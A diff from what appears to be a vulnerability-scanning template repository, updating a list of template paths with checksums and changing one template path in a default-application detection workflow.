http/misconfiguration/proxy/open-proxy-localhost.yaml:2a876eb905cbd8591af8d8c7cb8494fd2db314e9
|
||||
http/misconfiguration/proxy/open-proxy-portscan.yaml:10aaa6234f8c68a346e226e5bc615de2134ac10e
|
||||
http/misconfiguration/proxy/open-proxy-internal.yaml:231fecdb37f031eb304aba2267a8ba6ad16641ec
|
||||
http/misconfiguration/proxy/open-proxy-localhost.yaml:583e013ed1b8deaaa42735861dc5201a8285afc6
|
||||
http/misconfiguration/proxy/open-proxy-portscan.yaml:790b7ea770648cb312cb5c103951c3c7254cb0c2
|
||||
http/misconfiguration/puppetdb-dashboard.yaml:5b1f354f5ab9343e46a20bd7c76a8ee044cf71b4
|
||||
http/misconfiguration/put-method-enabled.yaml:4cbb1715aeb73cf6e638b02c9951ff02c7a67756
|
||||
http/misconfiguration/python-metrics.yaml:0b1d1102e4329ebf75ae5cc259898f1cb1cd9670
|
||||
|
@ -6407,6 +6414,7 @@ http/technologies/dell/dell-idrac8-detect.yaml:1dff3a1be021d38ea8846d6151c920edb
|
|||
http/technologies/dell/dell-idrac9-detect.yaml:44da5eecdb4a220ccde1aecdd8c801986a988367
|
||||
http/technologies/detect-sentry.yaml:f4f51185253e23a6e3db1f4bbcb1a37bebf4da1a
|
||||
http/technologies/devexpress-detect.yaml:6a5327a8a84357f2e365da16936697859e0f6020
|
||||
http/technologies/directus-detect.yaml:6284abebab6cc1c447f02dd03c711303a4cdd22f
|
||||
http/technologies/dreambox-detect.yaml:35362632d9ed50a1e5b4513bfc5a09543c63e431
|
||||
http/technologies/drupal-detect.yaml:5c269fdf58cf085a8ac062b1f23cd8b3a0ef7f99
|
||||
http/technologies/dwr-index-detect.yaml:11ebf6bffb83d15af8cbca407b38fee3d67b72ab
|
||||
|
@ -6426,7 +6434,7 @@ http/technologies/fanruanoa-detect.yaml:e7b2e01057d3be79d3ddbcc64b33f9af7a33bbb1
|
|||
http/technologies/fanruanoa2012-detect.yaml:f9a6f78d0d2e34d49a10f73f592bd87169259bac
|
||||
http/technologies/fastjson-version.yaml:50f165d16a31d441a597695102e983ebbaa1857a
|
||||
http/technologies/favicon-detect.yaml:10cb70dd76719f7850249d0b9184054205fd47f5
|
||||
http/technologies/fingerprinthub-web-fingerprints.yaml:27e666a6c70080629b106d8a7549a69b04e80292
|
||||
http/technologies/fingerprinthub-web-fingerprints.yaml:4dbe54eb11797d8ee2acfbafbf269363102734bd
|
||||
http/technologies/froxlor-detect.yaml:67aaf702a20981d17394938929f1835d6b48e6b2
|
||||
http/technologies/geo-webserver-detect.yaml:53e3388afdaa4abc6d221db435f0c3ee78dfe3e9
|
||||
http/technologies/geth-server-detect.yaml:caf614fcafdfca5f044916adf9dde2abb41b46a9
|
||||
|
@ -6447,7 +6455,7 @@ http/technologies/google-frontend-httpserver.yaml:de094bfafe3b5aea16e1bffb3ab80c
|
|||
http/technologies/graphiql-detect.yaml:a50e33498f73c5c27694fdad64d7d5f06dc1fe29
|
||||
http/technologies/graphql-detect.yaml:a0566e15058b3aeb2d4dae77cc99d23355938dac
|
||||
http/technologies/grav-cms-detect.yaml:f353a0fa76204ccd1c894aa850f977fef8c769f1
|
||||
http/technologies/graylog/graylog-api-exposure.yaml:5a677a5db5ed943770e6f6a1c2cf4e6e8f947b36
|
||||
http/technologies/graylog/graylog-api-exposure.yaml:d101cae7fd923dd7f233bf27e3a9b3628b8c3d5e
|
||||
http/technologies/graylog-api-browser.yaml:5aaa8bff99b57cf700d0923b48778048789f2389
|
||||
http/technologies/gunicorn-detect.yaml:4e32fda7d9483af8c21fd3ea7fa6669266e23d0d
|
||||
http/technologies/hanwang-detect.yaml:4866144f96b1fbc18567e10ad7732b8a1a8dfc5f
|
||||
|
@ -6532,7 +6540,7 @@ http/technologies/microsoft/aspnetmvc-version-disclosure.yaml:341d9ec2d4e676c7d0
|
|||
http/technologies/microsoft/default-iis7-page.yaml:c4e22ee6e9c969c526ea2609a510a8e23150963d
|
||||
http/technologies/microsoft/default-microsoft-azure-page.yaml:edf6bd39671cbd1eeda217a1956965a66e368d06
|
||||
http/technologies/microsoft/default-windows-server-page.yaml:eddc0c09081a8fdfdd579671ba67816b49e8bb81
|
||||
http/technologies/microsoft/microsoft-iis-version.yaml:879e7e413c5a14c9f8d60c781d1a2d6e14082a0c
|
||||
http/technologies/microsoft/microsoft-iis-version.yaml:dcf1fea08a8e195fb4fb800bddc0355619141c06
|
||||
http/technologies/microsoft/microsoft-sharepoint-detect.yaml:dabe925d2623a1e643cc36887c63daa6079a51d7
|
||||
http/technologies/microsoft/ms-exchange-server.yaml:ac56edde8f4b9be40add08dffaa028504eeedd69
|
||||
http/technologies/microsoft/sql-server-reporting.yaml:f09e2468fe44fbccafc12b034f080bee81f7c7e8
|
||||
|
@ -6677,6 +6685,7 @@ http/technologies/web-ftp-detect.yaml:ceaf8743ca94c6fbf3e7d380d0ed9be6f3796120
|
|||
http/technologies/web-suite-detect.yaml:94ce185f9aee3a32ab9391218413ba5b4efd408f
|
||||
http/technologies/weblogic-detect.yaml:57acbd03a2cd58cd94f92843578359a5b479ac5d
|
||||
http/technologies/werkzeug-debugger-detect.yaml:af81a25156ac286ceb63a2599e8b8ddfc6a34542
|
||||
http/technologies/wing-ftp-service-detect.yaml:0df5cbc14e688f4a21fb88751550ed2dc27e5497
|
||||
http/technologies/wms-server-detect.yaml:a12dcf5c63bb483cadc2179824ea7bc811565a9d
|
||||
http/technologies/wondercms-detect.yaml:940ebbd50bb93299d72b2cc4712da95f4dcb24e8
|
||||
http/technologies/wordpress/plugins/ad-inserter.yaml:e1496850b2a8ebec1b470544d5bb38e52760d900
|
||||
|
@ -7609,6 +7618,7 @@ http/vulnerabilities/other/unauth-hoteldruid-panel.yaml:279bc487a6928ac8687f5e2e
|
|||
http/vulnerabilities/other/unauth-spark-api.yaml:d3205ad468e29b3fd6d59637db539399b1c93c64
|
||||
http/vulnerabilities/other/unifi-network-log4j-rce.yaml:ab0f3c5c653a7406ee48d9a1ee0b1b810801c6db
|
||||
http/vulnerabilities/other/universal-media-xss.yaml:18afec046906e2afc3c2a1b9eee94e6fed1008e9
|
||||
http/vulnerabilities/other/ups-network-lfi.yaml:973370147cfb7fb529fd2c978f4900ccef9215af
|
||||
http/vulnerabilities/other/vanguard-post-xss.yaml:ebea3529277da89f92f263b4c2e01b1440ead349
|
||||
http/vulnerabilities/other/viewlinc-crlf-injection.yaml:dc9df9a7e0f610a07fe7611c166ae358706450ce
|
||||
http/vulnerabilities/other/vmware-siterecovery-log4j-rce.yaml:e69e54fb6312bebd4dd9e111db93045fea6eedef
|
||||
|
@ -7702,7 +7712,7 @@ http/vulnerabilities/thinkphp/thinkphp-509-information-disclosure.yaml:63ec56f7d
|
|||
http/vulnerabilities/tongda/tongda-action-uploadfile.yaml:26127f055c9c3ffa79366002ca95ea0c80a9c1dc
|
||||
http/vulnerabilities/tongda/tongda-api-file-upload.yaml:868bdf72215e96c1c0b2f2a4e68ecefa98bf453c
|
||||
http/vulnerabilities/tongda/tongda-arbitrary-login.yaml:813a5228a57a292be77d48351f979e9b4ce4bdcc
|
||||
http/vulnerabilities/tongda/tongda-auth-bypass.yaml:4fd1922eebdd4690602da2a46f2db2aafdfcef26
|
||||
http/vulnerabilities/tongda/tongda-auth-bypass.yaml:99626945f8fb206ae2046e9f22cebadaef9eef0e
|
||||
http/vulnerabilities/tongda/tongda-contact-list-exposure.yaml:d1d9be064a074860683581a4e84f8e85a3abfc27
|
||||
http/vulnerabilities/tongda/tongda-getdata-rce.yaml:b4452e0abc9faa89378a2d6b14c6ef99eddbb56d
|
||||
http/vulnerabilities/tongda/tongda-getway-rfi.yaml:02cae92f443ca026546155a79f51aab073d2a0dd
|
||||
|
@ -7944,7 +7954,7 @@ http/vulnerabilities/wordpress/wp-vault-lfi.yaml:12ee639ae8dd7fb66560ac713aab3a4
|
|||
http/vulnerabilities/wordpress/wp-woocommerce-email-verification.yaml:d36b1dafca4c01fbc15d17c4e884144f36974304
|
||||
http/vulnerabilities/wordpress/wp-woocommerce-file-download.yaml:9cd53ef3a743e970ff37c36b2c9640781d578878
|
||||
http/vulnerabilities/wordpress/wp-woocommerce-pdf-invoice-listing.yaml:0e1c6d447132c374e620d553de2cd8a8468f917e
|
||||
http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml:f19c8ecb61fc6cb7a1d1c1f94898be756d976779
|
||||
http/vulnerabilities/wordpress/wp-xmlrpc-brute-force.yaml:a9c485aef2957f73eec1ea22a2b851f98284f9c9
|
||||
http/vulnerabilities/wordpress/wp-xmlrpc-pingback-detection.yaml:f72f913987c22ad251d6b4b09e10fe57f20f0727
|
||||
http/vulnerabilities/wordpress/wp-xmlrpc.yaml:b55a9ba158dc74c9797ce3cddb6464bf48106074
|
||||
http/vulnerabilities/wordpress/wp-yoast-user-enumeration.yaml:ec8dd93cf0c3f663465b7191136013def01f5d0f
|
||||
|
@ -7985,13 +7995,13 @@ http/vulnerabilities/zzzcms/zzzcms-info-disclosure.yaml:daa2040c8238fbe51311e7ac
|
|||
http/vulnerabilities/zzzcms/zzzcms-ssrf.yaml:80348e0fda22d428224a9a62afae01b8380694a0
|
||||
http/vulnerabilities/zzzcms/zzzcms-xss.yaml:61a6fd65556054e8e2a631080388aff7aed42f6b
|
||||
javascript/cves/2016/CVE-2016-8706.yaml:823829801f090b3c8aa0b65a21f506da440cb2a0
|
||||
javascript/cves/2023/CVE-2023-34039.yaml:99873aefa26ca441bdea56e83f1433ddc11054c4
|
||||
javascript/cves/2023/CVE-2023-46604.yaml:5f4409197ba9dd7f86ae5de4beb6409ce7f1bfb8
|
||||
javascript/cves/2023/CVE-2023-34039.yaml:d24071fd6387e212e60bd6503d2611015bea58cb
|
||||
javascript/cves/2023/CVE-2023-46604.yaml:ded5a8bcb92125c053b218e259931104983bd625
|
||||
javascript/cves/2024/CVE-2024-23897.yaml:2de4bb803c9ebd5e8a989cc1760102ea53ee95d3
|
||||
javascript/default-logins/mssql-default-logins.yaml:b95502ea9632648bc430c61995e3d80d0c46f161
|
||||
javascript/default-logins/postgres-default-logins.yaml:0b960d1c695d009536b0846c5a393731d3fac7ad
|
||||
javascript/default-logins/redis-default-logins.yaml:f9a03987fac4e8150d9b8d5ab80779c6f41d8b7f
|
||||
javascript/default-logins/ssh-default-logins.yaml:18115e88843b935c771139ba788aa321a8a8e75b
|
||||
javascript/default-logins/ssh-default-logins.yaml:7e0cd6f7e1cd9ff4473f9c0d9061f056234cbb62
|
||||
javascript/detection/mssql-detect.yaml:3dad2c227b904cc228247a86bf0372c5b2544b94
|
||||
javascript/detection/oracle-tns-listener.yaml:3d274f668de183b62c79c04782bf0740150b4423
|
||||
javascript/detection/ssh-auth-methods.yaml:7240dac7d7ee80f4aebf95f7ddf7a540874adf04
|
||||
|
@ -8136,10 +8146,10 @@ network/misconfig/erlang-daemon.yaml:5360cef90f48dc3c6bdab6df6e44245f243f423c
|
|||
network/misconfig/ganglia-xml-grid-monitor.yaml:dac3b1babe27265e34d19b1bac7388d65f89281b
|
||||
network/misconfig/memcached-stats.yaml:18844aac24b0279e3bb974baccf32256d5482109
|
||||
network/misconfig/mongodb-unauth.yaml:0a25bf55d5fedd1b56c397ae27e93483018ae16a
|
||||
network/misconfig/mysql-native-password.yaml:214396d10e5a824362e0184c365b862581629394
|
||||
network/misconfig/mysql-native-password.yaml:610a602de84dc589c5f48b133d27f6b77f3cc422
|
||||
network/misconfig/printers-info-leak.yaml:3eaf0fc4e07c21308b3bd7f387f2f6765979ad15
|
||||
network/misconfig/sap-router-info-leak.yaml:a7ebbd8a06f5add2a3ded6259da9b3b3b5e0f005
|
||||
network/misconfig/tidb-native-password.yaml:140577255bfbe46ab1c88e594405a34b889a56f8
|
||||
network/misconfig/tidb-native-password.yaml:e59b6ae7f999845de1660e740e99c300175f2845
|
||||
network/misconfig/tidb-unauth.yaml:5c00fa571b47b099a046afc2a7ff5aba4bfd20fd
|
||||
network/misconfig/unauth-psql.yaml:4234beb83e518739f430de109340c402c96a3740
|
||||
network/vulnerabilities/clockwatch-enterprise-rce.yaml:3b34549e3d1b3ddcddab7a8cdfd7b9c57c8f2d37
|
||||
|
@ -8170,7 +8180,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a
|
|||
ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19
|
||||
ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89
|
||||
ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210
|
||||
templates-checksum.txt:f6eaac90af8e77b23be2e3482cf5afbd3b015566
|
||||
templates-checksum.txt:608bfc81bcb7af107a327b22977799f2016e33a5
|
||||
wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1
|
||||
workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0
|
||||
workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4
|
||||
|
@ -8209,7 +8219,7 @@ workflows/concrete-workflow.yaml:9ce74c7f22e588fe67965f30608d5b4c2b63b97b
|
|||
workflows/confluence-workflow.yaml:68fd7ea4f21d30bfb2898f6b714728dcf08c5fbc
|
||||
workflows/dahua-workflow.yaml:2e6e287ca5c83229a03cc790fca31962ca0a8a1a
|
||||
workflows/dedecms-workflow.yaml:c96c00339a55a8ede0578bdb8ae625b4b6d7e32d
|
||||
workflows/default-application-workflow.yaml:07fe2d7545f5768661550d63536b0fe61f4433bb
|
||||
workflows/default-application-workflow.yaml:df25752fc3cc808eaba4d365f2924744130db71a
|
||||
workflows/dell-idrac-workflow.yaml:40a2853262007c7904c0ca6ceeff8116d2694139
|
||||
workflows/dolibarr-workflow.yaml:36c2eaa9e3aabe24b61b95c7e451dae5f26939b5
|
||||
workflows/dotnetnuke-workflow.yaml:8e2578065d576a59c30a807fab1913ae5726a779
|
||||
|
|
|
@ -4,6 +4,7 @@ info:
|
|||
name: Default Web Application Detection
|
||||
author: andydoering
|
||||
description: Detects default installations of web applications
|
||||
|
||||
workflows:
|
||||
- template: http/technologies/apache/default-apache-test-all.yaml
|
||||
|
||||
|
@ -23,7 +24,7 @@ workflows:
|
|||
|
||||
- template: http/technologies/default-django-page.yaml
|
||||
|
||||
- template: http/exposures/files/drupal-install.yaml
|
||||
- template: http/misconfiguration/installer/drupal-install.yaml
|
||||
|
||||
- template: http/technologies/oracle/default-oracle-application-page.yaml
|
||||
|
||||
|
|
Loading…
Reference in New Issue